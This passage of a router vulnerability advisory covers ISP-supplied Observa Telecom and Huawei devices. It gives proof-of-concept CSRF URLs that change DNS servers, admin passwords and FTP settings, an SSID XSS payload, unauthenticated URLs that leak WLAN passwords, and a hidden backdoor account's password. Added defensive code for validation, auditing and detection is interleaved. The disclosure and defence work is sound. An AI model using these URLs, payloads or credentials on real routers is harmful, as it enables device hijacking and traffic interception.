------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Every input field is vulnerable to Cross Site Request Forgery   
(CSRF) attacks.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121786 (http://osvdb.org/show/osvdb/121786)  
  
* PoC:  
For example, if an attacker wants to change the DNS servers, he may use the following URL to do so  
once the victim opens the link:  
http://192.168.1.1/form2Dns.cgi?dnsMode="1"&dns1="37.252.96.88"&dns2="37.252.96.89"&dns3=""&submit.htm?dns.htm="Send"&save="Aplicar cambios"  
  
It is also possible for an attacker to change the default router administrator password by   
sending the victim this URL:   
http://192.168.1.1/form2userconfig.cgi?username="1234"&privilege=2&oldpass="1234"&newpass="newpass"&confpass="newpass"&modify="Modificar"&select="s0"&hiddenpass="1234"&submit.htm?userconfig.htm="Send"  
The URL above forces the administrator user (this is always the user named 1234)  
to change his default password from 1234 to newpass.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------------ Denial of Service -----------------------------------  
* Description: An attacker is able to carry out an external Denial of Service  
attack.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
  
* PoC:  
It is possible for an attacker to carry out a Denial of Service attack through CSRF:   
http://192.168.1.1/form2Reboot.cgi?rebootMode=0&reboot="Reiniciar"&submit.htm?reboot.htm="Send"  
  
If a victim opens this URL, the router replies with an HTTP 200 OK status code and reboots.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121789 (http://osvdb.org/show/osvdb/121789)  
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored within the DHCP Active Clients table (/dhcptbl.html).  
Once the victim views this list, the script is executed.  
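The DHCP-hostname injection works because the firmware stores whatever bytes arrive in the Host Name option (option 12) and later renders them in the clients table. As an added example (not from the advisory), this is the validation a firmware's DHCP server could apply before storing the name: the packet builder and the MAC address are constructed fixtures, and the RFC 1123 label rule is the assumption behind what counts as an acceptable hostname.

```python
import re
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"   # RFC 2132 marker that starts the options field
OPT_MESSAGE_TYPE = 53
OPT_HOST_NAME = 12                  # RFC 2132 "Host Name" option
OPT_END = 255
FIXED_HEADER_LEN = 236              # op .. file fields that precede the cookie
# RFC 1123 label: letters, digits, hyphens; 1-63 chars; no leading/trailing hyphen.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def parse_dhcp_options(packet: bytes) -> dict:
    """Return {code: raw value} from the options area of a DHCP message.
    PAD (0) has no length byte; END (255) terminates the list."""
    if packet[FIXED_HEADER_LEN:FIXED_HEADER_LEN + 4] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message (bad magic cookie)")
    options = {}
    i = FIXED_HEADER_LEN + 4
    while i < len(packet):
        code = packet[i]
        if code == 0:
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        options[code] = value
        i += 2 + length
    return options


def safe_hostname(raw: bytes, fallback: str) -> str:
    """Accept only an RFC 1123 hostname; anything else (script tags, quotes, control
    characters, non-ASCII, empty) is replaced by the fallback, e.g. the MAC address."""
    try:
        name = raw.decode("ascii")
    except UnicodeDecodeError:
        return fallback
    if not 0 < len(name) <= 253:
        return fallback
    if all(LABEL_RE.match(label) for label in name.split(".")):
        return name
    return fallback


def client_display_name(packet: bytes, mac: str) -> str:
    """What the 'active clients' table should store for this lease."""
    options = parse_dhcp_options(packet)
    return safe_hostname(options.get(OPT_HOST_NAME, b""), fallback=mac)


def build_dhcp_request(mac: bytes, hostname: bytes) -> bytes:
    """Construct a minimal DHCPREQUEST carrying a Host Name option (test fixture only)."""
    # op, htype, hlen, hops, xid, secs, flags, ciaddr, yiaddr, siaddr, giaddr
    header = struct.pack("!BBBBIHHIIII", 1, 1, 6, 0, 0x3903F326, 0, 0x8000, 0, 0, 0, 0)
    chaddr = mac.ljust(16, b"\x00")
    sname, file = b"\x00" * 64, b"\x00" * 128
    options = bytes([OPT_MESSAGE_TYPE, 1, 3])                 # DHCPREQUEST
    options += bytes([OPT_HOST_NAME, len(hostname)]) + hostname
    options += bytes([OPT_END])
    return header + chaddr + sname + file + MAGIC_COOKIE + options


if __name__ == "__main__":
    mac = "00:11:22:33:44:55"
    for host in (b"laptop-01", b"<script>alert(1)</script>", b"a" * 64):
        pkt = build_dhcp_request(bytes.fromhex(mac.replace(":", "")), host)
        print(repr(host), "->", client_display_name(pkt, mac))
```

Validation at the DHCP server is the first layer; the page that renders the table still has to HTML-encode every stored value, because the same table is fed by other unvalidated sources (static leases, names edited in the UI) on many devices.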
  
--------------------------------------------------------------------------------------------  
  
----------------------------------------- Backdoor ---------------------------------------  
* Description: There is a second default administrator user who is hidden from the   
legitimate router owner.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121785 (http://osvdb.org/show/osvdb/121785)  
  
* PoC:  
In addition to the well-known 1234 administrator user, there is another one named admin,   
whose password is 7449airocon.  
  
This superuser remains hidden (it only appears in the backup configuration XML file)   
and is able to modify any configuration setting either through the web interface or   
through telnet.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules,   
carry out a persistent denial of service and obtain the WLAN   
passwords, among other things, by using the supported Universal   
Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router   
needs to be factory reset to work properly again) or open critical ports, even for remote   
hosts which are not in the LAN.   
  
It is also possible for an attacker to change the WPS configuration settings, reset the AP   
to the default ones and obtain critical information, such as WLAN passwords.  
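Added example of the policy an IGD control endpoint should enforce before executing an action (not code from the advisory or from any vendor): the control URL is LAN-only, only an allow-list of actions is served, and an AddPortMapping may only lead back to the host that requested it, which is exactly what rules out mappings to hosts outside the LAN. The 192.168.1.0/24 LAN, the allow/deny lists and the `soap_request` fixture are assumptions; AddPortMapping, ForceTermination and the `New*` argument names are the standard WANIPConnection ones the advisory refers to.

```python
import ipaddress
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WANIP_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"
LAN_NET = ipaddress.ip_network("192.168.1.0/24")   # assumption: the device's LAN
# Read-only queries and self-mappings are all a LAN host legitimately needs.
ALLOWED_ACTIONS = {"GetExternalIPAddress", "GetStatusInfo", "AddPortMapping", "DeletePortMapping"}
# Actions that drop or reconfigure the WAN link: never without authentication.
DENIED_ACTIONS = {"ForceTermination", "RequestTermination", "SetConnectionType"}


def parse_soap_action(body: str):
    """Return (action, {argument: value}) from an IGD control request body."""
    root = ET.fromstring(body)
    soap_body = root.find(f"{{{SOAP_NS}}}Body")
    if soap_body is None or len(soap_body) == 0:
        raise ValueError("no SOAP Body")
    action_el = soap_body[0]
    ns, _, action = action_el.tag.rpartition("}")
    if ns.lstrip("{") != WANIP_NS:
        raise ValueError(f"unexpected service namespace {ns}")
    # UPnP argument elements are unqualified, so child.tag is the bare argument name.
    args = {child.tag: (child.text or "").strip() for child in action_el}
    return action, args


def evaluate(body: str, src_ip: str, from_wan: bool):
    """Decide whether the control endpoint may execute this request.
    Returns (allowed, reason)."""
    if from_wan:
        return False, "UPnP control endpoint must not be reachable from the WAN"
    src = ipaddress.ip_address(src_ip)
    if src not in LAN_NET:
        return False, f"source {src_ip} is outside the LAN"
    try:
        action, args = parse_soap_action(body)
    except (ET.ParseError, ValueError) as exc:
        return False, f"malformed request: {exc}"
    if action in DENIED_ACTIONS:
        return False, f"{action} is disabled"
    if action not in ALLOWED_ACTIONS:
        return False, f"{action} is not on the allow-list"
    if action == "AddPortMapping":
        try:
            client = ipaddress.ip_address(args.get("NewInternalClient", ""))
            ext_port = int(args.get("NewExternalPort", "0"))
            int_port = int(args.get("NewInternalPort", "0"))
        except ValueError:
            return False, "invalid AddPortMapping arguments"
        if client != src:
            # Also covers internal clients outside the LAN, since src is inside it.
            return False, "a host may only open ports that lead back to itself"
        if not (0 < ext_port < 65536 and 0 < int_port < 65536):
            return False, "port out of range"
        if args.get("NewLeaseDuration", "0") == "0":
            return False, "permanent mappings are not allowed; request a finite lease"
    return True, "ok"


def soap_request(action: str, **args) -> str:
    """Construct a WANIPConnection SOAP body (test fixture)."""
    inner = "".join(f"<{k}>{v}</{k}>" for k, v in args.items())
    return (f'<?xml version="1.0"?>'
            f'<s:Envelope xmlns:s="{SOAP_NS}" '
            f's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            f'<s:Body><u:{action} xmlns:u="{WANIP_NS}">{inner}</u:{action}></s:Body></s:Envelope>')


if __name__ == "__main__":
    req = soap_request("AddPortMapping", NewRemoteHost="", NewExternalPort="8080",
                       NewProtocol="TCP", NewInternalPort="8080",
                       NewInternalClient="192.168.1.50", NewEnabled="1",
                       NewPortMappingDescription="game", NewLeaseDuration="3600")
    print(evaluate(req, "192.168.1.50", from_wan=False))
    print(evaluate(soap_request("ForceTermination"), "192.168.1.50", from_wan=False))
```

Where the firmware cannot be changed, the same effect is obtained by disabling UPnP on the device and, on the LAN side, watching for SOAP requests whose `NewInternalClient` differs from the sender.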
============================================================================================  
  
  
============================================================================================  
Manufacturer: Observa Telecom  
Model: Home Station BHS-RTA  
Tested firmwares: v1.1.3  
Comments: Common router that Spanish ISP Telefónica used to give away to their   
ADSL/VDSL customers  
--------------------------------------------------------------------------------------------  
  
--------------------------------- Information Disclosure ---------------------------------  
* Description: Observa Telecom Home Station BHS-RTA web interface allows an   
external attacker to obtain critical information without any login   
process.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121781 (http://osvdb.org/show/osvdb/121781),  
OSVDB-121782 (http://osvdb.org/show/osvdb/121782),  
OSVDB-121783 (http://osvdb.org/show/osvdb/121783) and  
OSVDB-121784 (http://osvdb.org/show/osvdb/121784)  
  
* PoC:  
Without requiring any login process, an external attacker is able to obtain critical   
information such as the WLAN password and settings, the Internet configuration, a list of   
connected clients, etc.  
  
By accessing the following URL, the browser shows the WLAN configuration, including the   
passwords:  
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101  
  
By accessing the following URL, the browser shows a list of connected clients, including   
their IP and MAC addresses:   
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101  
  
By accessing the following URL, the browser shows the Internet configuration parameters:  
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=returnInternetJSON.txt&_=1430086980134  
  
By accessing the following URL, the browser shows whether the administrator password has   
been changed or is still the default one:  
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnPasswordJSON.txt&var:page=returnPasswordJSON.txt&_=1430086980134  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router   
needs to be factory reset to work properly again) or open critical ports, even for remote   
hosts which are not in the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Observa Telecom  
Model: VH4032N  
Tested firmwares: VH4032N_V0.2.35  
Comments: Common router that ISP Vodafone used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121793 (http://osvdb.org/show/osvdb/121793)  
  
* PoC:  
The vulnerability lies in some input fields that accept special characters and echo the   
submitted value back into the web interface itself.  
  
E.g., the SSID input field is vulnerable if the following code is written into it:  
‘; </script><script>alert(1)</script><script>//  
The malicious code will be executed throughout the whole web interface.  
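The SSID payload above only works because the value is spliced into a `<script>` block as-is, so its `</script>` closes the real script element and what follows is parsed as markup. As an added example (not the router's code), this shows the unsafe rendering beside the output encoding that neutralises it; the table/script layout is an assumed rendering of the WLAN page, and the payload is the one from the PoC above with a straight quote assumed for its first character.

```python
import html
import json

# The advisory's SSID payload (straight quote assumed for the leading character).
PAYLOAD = "'; </script><script>alert(1)</script><script>//"


def js_string_literal(value: str) -> str:
    """JSON-encode for a <script> context and additionally escape the characters
    that could close the script element or start a tag/entity in the surrounding HTML."""
    return (json.dumps(value)            # quotes, backslashes, control chars, non-ASCII
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_unsafe(ssid: str) -> str:
    """The pattern behind the bug: the SSID is spliced into markup and script as-is."""
    return (f"<tr><td>SSID</td><td>{ssid}</td></tr>\n"
            f"<script>var ssid = '{ssid}';</script>")


def render_safe(ssid: str) -> str:
    """Same page with context-appropriate encoding: HTML entities in the table cell,
    a JSON/JS string literal inside the script element."""
    return (f"<tr><td>SSID</td><td>{html.escape(ssid, quote=True)}</td></tr>\n"
            f"<script>var ssid = {js_string_literal(ssid)};</script>")


def script_tag_count(page: str) -> int:
    """How many <script elements a browser would see; the legitimate page has one."""
    return page.lower().count("<script")


def roundtrip_from_script(page: str) -> str:
    """Extract the literal the JS engine would evaluate and decode it (the JSON
    escapes \\u003c etc. are valid JS string escapes too), proving no data is lost."""
    start = page.index("var ssid = ") + len("var ssid = ")
    end = page.index(";</script>", start)
    return json.loads(page[start:end])


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(script_tag_count(render_unsafe(PAYLOAD)), "script elements (unsafe)")
    print(render_safe(PAYLOAD))
    print(script_tag_count(render_safe(PAYLOAD)), "script element (safe)")
```

Encoding has to match the context the value lands in: `html.escape` alone would not protect the script block (a quote in a JS string is not an HTML metacharacter), and JSON encoding alone would not protect the table cell, which is why the two sinks use different encoders.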
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Every input field is vulnerable to Cross Site Request Forgery   
(CSRF) attacks.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121791 (http://osvdb.org/show/osvdb/121791) and  
OSVDB-121792 (http://osvdb.org/show/osvdb/121792)  
  
* PoC:  
Although a token tied to the session ID exists, configuration settings can be modified   
without it. Thus, every input field is vulnerable to CSRF attacks.  
  
E.g., if an attacker wants to change the administrator password, he may use the following   
URL to do so once the victim opens the link:   
http://192.168.0.1/en_US/administration.cgi?usrPassword=newpass  
  
If an attacker wants to change the FTP server configuration settings, such as the password   
and whether FTP connections from the WAN are allowed, he may use the following link:  
http://192.168.0.1/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword=vulnpass&ftpPort=21&ftpAclMode=2  
  
--------------------------------------------------------------------------------------------  
  
------------------------ Bypass Authentication using SMB Symlinks ------------------------  
* Description: An external attacker, without requiring any login process, is able   
to download the whole router kernel filesystem, including all the   
configuration information and the user account information files,   
by creating symbolic links through the router Samba server.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121790 (http://osvdb.org/show/osvdb/121790)  
  
* PoC:  
An unauthenticated attacker is able to download the whole router filesystem by connecting   
to the Samba server.   
  
There is a shared service (called storage) in which it is possible to create symbolic links   
to the router filesystem and download the content. E.g., a symlink to / is possible and   
allows the attacker to freely view and download the entire filesystem.  
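Added example (not from the advisory): an audit of the Samba share settings that make the symlink escape above possible. The smb.conf fragments are constructed; `follow symlinks`, `wide links`, `unix extensions`, `guest ok` and `read only` are standard Samba parameters. Modern Samba forces `wide links` off while `unix extensions` is on, but embedded builds are often old, so the audit treats an explicit `wide links = yes` as a finding regardless.

```python
import configparser

# Constructed smb.conf fragments: the weak layout and the hardened one.
WEAK_SMB_CONF = """\
[global]
workgroup = WORKGROUP
wide links = yes
map to guest = Bad User

[storage]
path = /mnt/usb
guest ok = yes
read only = no
follow symlinks = yes
"""

HARDENED_SMB_CONF = """\
[global]
workgroup = WORKGROUP
wide links = no
# unix extensions stay at the default (yes); current Samba then forces wide links off.

[storage]
path = /mnt/usb
guest ok = no
read only = no
follow symlinks = no
"""


def load_smb_conf(text: str) -> configparser.ConfigParser:
    """smb.conf is INI-like: sections per share, 'key = value' lines, # and ; comments."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    return cp


def effective_bool(cp, share: str, key: str, default: bool) -> bool:
    """Share-level value, else [global] value, else Samba's documented default."""
    for section in (share, "global"):
        if cp.has_option(section, key):
            return cp.getboolean(section, key)
    return default


def is_writable(cp, share: str) -> bool:
    """'writable'/'writeable' are synonyms for the inverse of 'read only' (default yes)."""
    for key in ("writable", "writeable"):
        if cp.has_option(share, key):
            return cp.getboolean(share, key)
    return not effective_bool(cp, share, "read only", True)


def audit_shares(text: str) -> dict:
    """Return {share: [finding, ...]} for every file share in the configuration."""
    cp = load_smb_conf(text)
    findings = {}
    for share in cp.sections():
        if share.lower() in ("global", "printers"):
            continue
        # follow symlinks (default yes) lets the server dereference links inside the
        # share; wide links (default no) lets them point outside it, e.g. to /.
        follow = effective_bool(cp, share, "follow symlinks", True)
        wide = effective_bool(cp, share, "wide links", False)
        issues = []
        if follow and wide:
            issues.append("wide-links-escape")   # a symlink to / exposes the whole filesystem
        if effective_bool(cp, share, "guest ok", False) and is_writable(cp, share):
            issues.append("guest-writable")      # anonymous clients can create that symlink
        findings[share] = issues
    return findings


if __name__ == "__main__":
    print("weak:    ", audit_shares(WEAK_SMB_CONF))
    print("hardened:", audit_shares(HARDENED_SMB_CONF))
```

The two findings are independent: `wide-links-escape` is what turns a symlink into a filesystem read, and `guest-writable` is what lets an unauthenticated client plant the symlink in the first place; a share needs both before the attack in this section works without credentials.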
  
--------------------------------------------------------------------------------------------  
  
---------------------------- USB Device Bypass Authentication ----------------------------  
* Description: An external attacker, without requiring any login process, is able   
to view, modify, delete and upload new files to the USB storage   
device connected to the router.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121794 (http://osvdb.org/show/osvdb/121794)  
  
* PoC:  
If a USB storage device is hooked up to the router, an external attacker is able to   
download, modify the content and upload new files, without requiring any login process.  
  
In order to do so, the attacker only needs to access the router IP address on port 9000.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify the WPS configuration   
by using the supported Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the WPS configuration or   
resetting the AP to default settings.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Huawei  
Model: HG553  
Tested firmwares: V100R001C03B043SP01  
Comments: Common router that ISP Vodafone used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
---------------------------- USB Device Bypass Authentication ----------------------------  
* Description: An external attacker, without requiring any login process, is able   
to view, modify, delete and upload new files to the USB storage   
device connected to the router.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121778 (http://osvdb.org/show/osvdb/121778)  
  
* PoC:  
If a USB storage device is hooked up to the router, an external attacker is able to   
download, modify the content and upload new files, without requiring any login process.  
  
In order to do so, the attacker only needs to access the router IP address on port 9000.  
  
--------------------------------------------------------------------------------------------  
  
--------------------------------- Bypass Authentication ----------------------------------  
* Description: An external attacker, without requiring any login process, is able   
to reset the router settings to the default ones and to cause a   
permanent denial of service.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121779 (http://osvdb.org/show/osvdb/121779)  
  
* PoC:  
Without requiring any login process, an attacker is able to cause a permanent denial of   
service by constantly accessing the /rebootinfo.cgi URL.  
  
The attacker is also able to force the router to reset to default configuration settings by   
accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router   
by using the default credentials.  
  
In both attacks, the router replies with an HTTP 400 status code, but the reboot or the   
configuration reset is nevertheless executed.  
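Added example serving both this section and the BHS-RTA information-disclosure section above (not code from the advisory): a detector run over constructed web-server log lines in Common Log Format, which flags unauthenticated hits on the JSON API, reboot and restore endpoints and bursts of reboot requests from one source. The log lines, the 60-second window and the assumption that the router records the HTTP auth user in the CLF authuser field are constructed for the example; status codes are deliberately ignored because, as noted above, the reboot and reset execute even when the reply is 400.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# Endpoints from the advisory that must never be served without authentication.
SENSITIVE = [
    ("info-disclosure", re.compile(r"^/cgi-bin/webproc\?.*getpage=html/gui/APIS/return\w+JSON\.txt")),
    ("reboot", re.compile(r"^/rebootinfo\.cgi")),
    ("factory-reset", re.compile(r"^/restoreinfo\.cgi")),
]
BURST_COUNT, BURST_WINDOW = 3, timedelta(seconds=60)


def parse_line(line: str):
    """Return a dict for a CLF line, or None if it does not parse."""
    m = CLF_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def classify(path: str):
    """Name of the sensitive endpoint a request path hits, or None."""
    for name, pattern in SENSITIVE:
        if pattern.search(path):
            return name
    return None


def detect(lines):
    """Return a list of (rule, src, detail) alerts over an iterable of log lines."""
    alerts = []
    recent = defaultdict(deque)     # src -> timestamps of recent reboot hits
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec["path"])
        if kind is None:
            continue
        if rec["user"] == "-":      # no authenticated user recorded on the request
            alerts.append(("unauthenticated-" + kind, rec["src"], rec["path"]))
        if kind == "reboot":
            q = recent[rec["src"]]
            q.append(rec["ts"])
            while q and rec["ts"] - q[0] > BURST_WINDOW:
                q.popleft()
            if len(q) == BURST_COUNT:   # fire once, when the threshold is crossed
                alerts.append(("reboot-burst", rec["src"],
                               f"{len(q)} hits in {BURST_WINDOW.seconds}s"))
    return alerts


# Constructed sample: one unauthenticated API read, a reboot loop (401s turning into
# 400s, as described above) and an authenticated factory reset.
SAMPLE_LOG = """\
192.168.1.50 - - [07/May/2015:10:00:01 +0200] "GET /cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt HTTP/1.1" 200 512
192.168.1.50 - admin [07/May/2015:10:00:05 +0200] "GET /index.html HTTP/1.1" 200 2048
192.168.1.77 - - [07/May/2015:10:01:00 +0200] "GET /rebootinfo.cgi HTTP/1.1" 401 0
192.168.1.77 - - [07/May/2015:10:01:01 +0200] "GET /rebootinfo.cgi HTTP/1.1" 401 0
192.168.1.77 - - [07/May/2015:10:01:02 +0200] "GET /rebootinfo.cgi HTTP/1.1" 400 0
192.168.1.77 - - [07/May/2015:10:01:03 +0200] "GET /rebootinfo.cgi HTTP/1.1" 400 0
192.168.1.90 - admin [07/May/2015:10:05:00 +0200] "GET /restoreinfo.cgi HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Most of these devices do not keep an HTTP access log at all, so in practice the same rules are applied to a capture taken on the LAN side or to the logs of a proxy placed in front of the management interface.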
  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121776 (http://osvdb.org/show/osvdb/121776)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which an XSS can be performed.  
  
E.g., the SSID field within the WiFi->Básico (WiFi->Basic) subdirectory allows script code   
injection.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121775 (http://osvdb.org/show/osvdb/121775)  
  
* PoC:  
Every input field is vulnerable to Cross Site Request Forgery attacks.  
  
E.g., if an attacker wants to change the administrator password, he may use the following   
URL to do so once the victim opens the link:   
http://192.168.0.1/userpasswd.cgi?usrPassword=newpassword  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.  
OSVDB-122385 (http://osvdb.org/show/osvdb/122385)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (the router   
needs to be factory reset to work properly again) or open critical ports, even for remote   
hosts which are not in the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Huawei  
Model: HG556a  
Tested firmwares: V100R001C10B077  
Comments: Common router that ISP Vodafone used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
---------------------------- USB Device Bypass Authentication ----------------------------  
* Description: An external attacker, without requiring any login process, is able   
to view, modify, delete and upload new files to the USB storage   
device connected to the router.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121778 (http://osvdb.org/show/osvdb/121778)  
  
* PoC:  
If a USB storage device is hooked up to the router, an external attacker is able to   
download, modify the content and upload new files, without requiring any login process.  
  
In order to do so, the attacker only needs to access the router IP address on port 9000.  
  
--------------------------------------------------------------------------------------------  
  
--------------------------------- Bypass Authentication ----------------------------------  
* Description: An external attacker, without requiring any login process, is able   
to reset the router settings to the default ones and to cause a   
permanent denial of service.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121779 (http://osvdb.org/show/osvdb/121779)  
  
* PoC:  
Without requiring any login process, an attacker is able to cause a permanent denial of   
service by constantly accessing the /rebootinfo.cgi URL.  
  
The attacker is also able to force the router to reset to default configuration settings by   
accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router   
by using the default credentials.  
  
In both attacks, the router asks for a username and password and returns an HTTP 401   
(Unauthorized) status code, but after multiple requests are sent it replies with an HTTP   
400 status code and executes the action.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121775 (http://osvdb.org/show/osvdb/121775)  
  
* PoC:  
Every input field is vulnerable to Cross Site Request Forgery attacks.  
  
E.g., if an attacker wants to change the administrator password, he may use the following   
URL to do so once the victim opens the link:   
http://192.168.1.23/es_ES/expert/userpasswd.cgi?usrPassword=vodafone1&sSuccessPage=administration.htm&sErrorPage=administration.htm  
  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121776 (http://osvdb.org/show/osvdb/121776)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which an XSS can be performed.  
  
E.g., the SSID field within the WiFi->Nombre (WiFi->Name) subdirectory allows script code   
injection.   
The script execution can be clearly seen within different subdirectories such as   
diagnostic.htm and config_wifi.htm.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.  
OSVDB-121777 (http://osvdb.org/show/osvdb/121777)  
  
* PoC:  
